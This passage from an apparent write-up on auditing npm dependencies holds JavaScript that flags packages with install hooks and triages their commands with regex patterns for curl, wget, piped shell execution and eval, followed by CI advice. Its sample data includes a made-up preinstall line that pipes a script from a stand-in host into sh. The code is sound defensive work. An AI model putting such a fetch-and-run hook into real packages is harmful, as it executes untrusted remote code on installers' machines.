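// can be audited without installing anything.
function lockfileInstallScripts(lock) {
  return Object.entries(lock.packages || {})
    .filter(([path, entry]) => path !== "" && entry.hasInstallScript === true)
    .map(([path, entry]) => ({
      package: `${path.replace(/^.*node_modules\//, "")}@${entry.version}`,
      path,
    }));
}

// Check 2: after `npm ci --ignore-scripts`, read each installed package.json
// and report the actual commands. `tree` maps "name@version" to the parsed
// package.json object (an input shape assumed for this example).
function findInstallScripts(tree) {
  const findings = [];
  for (const [id, pkg] of Object.entries(tree)) {
    const scripts = (pkg && pkg.scripts) || {};
    for (const hook of INSTALL_HOOKS) {
      const cmd = scripts[hook];
      if (typeof cmd === "string" && cmd.trim() !== "") {
        findings.push({ package: id, hook, command: cmd, flags: classify(cmd) });
      }
    }
  }
  return findings;
}

// Rough triage of a script command. A hit means "read the package source
// before merging", not proof of malice: native builds and nested installs
// are common and legitimate, but each nested `npm install` runs a further
// set of dependencies' scripts that the top-level lockfile does not pin.
const PATTERNS = [
  ["remote-fetch", /\b(curl|wget|Invoke-WebRequest|iwr)\b/i],
  ["piped-exec", /\|\s*(sh|bash|node|python\d?)\b/i],
  ["inline-eval", /\b(node\s+-e|eval|base64\s+(-d|--decode))\b/i],
  ["nested-install", /\bnpm\s+(install|i|ci)\b/],
  ["native-build", /\b(node-gyp|prebuild-install|node-pre-gyp)\b/],
];

function classify(command) {
  return PATTERNS.filter(([, re]) => re.test(command)).map(([name]) => name);
}

// Constructed sample data. The pxt-core postinstall is the command Socket
// quoted in this PR; the websocket-extensions scripts object and the
// example-dropper package are made up for the example.
const SAMPLE_TREE = {
  "pxt-core@8.3.1": {
    scripts: {
      postinstall:
        "cd webapp && npm install && cd .. && cd skillmap && npm install && cd .. && cd authcode && npm install && cd .. && cd multiplayer && npm install && cd ..",
    },
  },
  "websocket-extensions@0.1.4": { scripts: { test: "echo constructed" } },
  "example-dropper@0.0.1": {
    scripts: { preinstall: "curl -s https://example.invalid/x.sh | sh" },
  },
};

const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "app", version: "1.0.0" },
    "node_modules/pxt-core": { version: "8.3.1", hasInstallScript: true },
    "node_modules/websocket-extensions": { version: "0.1.4" },
  },
};

// Results for the sample data, available to anyone importing this module.
const SAMPLE_REPORT = {
  fromLockfile: lockfileInstallScripts(SAMPLE_LOCK),
  fromTree: findInstallScripts(SAMPLE_TREE),
};
```

In CI the safe default is `npm ci --ignore-scripts`, followed by `npm rebuild <name>` only for the packages whose scripts have been reviewed and are actually needed (native modules, for instance). Here the lockfile check alone already points at `pxt-core@8.3.1`, and the command text shows four nested `npm install` runs, each of which would execute its own dependencies' install hooks.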
